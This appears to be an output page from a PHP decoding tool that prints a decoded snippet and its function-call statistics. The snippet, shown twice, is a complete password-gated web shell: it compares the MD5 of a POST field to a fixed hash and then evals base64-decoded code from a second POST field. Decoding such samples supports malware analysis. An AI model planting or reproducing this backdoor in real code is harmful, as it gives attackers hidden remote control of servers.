Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /*7599*/ if(md5($_POST["pf"]) === "93ad003d7fc57aae938ba483a65ddf6d") { eval(base64_..
Decoded Output download
<?php /*7599*/ if(md5($_POST["pf"]) === "93ad003d7fc57aae938ba483a65ddf6d") { eval(base64_decode($_POST["cookies_p"])); } /*7599*/ ?>
Did this file decode correctly?
Original Code
<?php /*7599*/ if(md5($_POST["pf"]) === "93ad003d7fc57aae938ba483a65ddf6d") { eval(base64_decode($_POST["cookies_p"])); } /*7599*/ ?>
Function Calls
| md5 | 1 |
| base64_decode | 1 |
Stats
| MD5 | 0235bf0b604e0db7c23f355cbe945ee9 |
| Eval Count | 0 |
| Decode Time | 101 ms |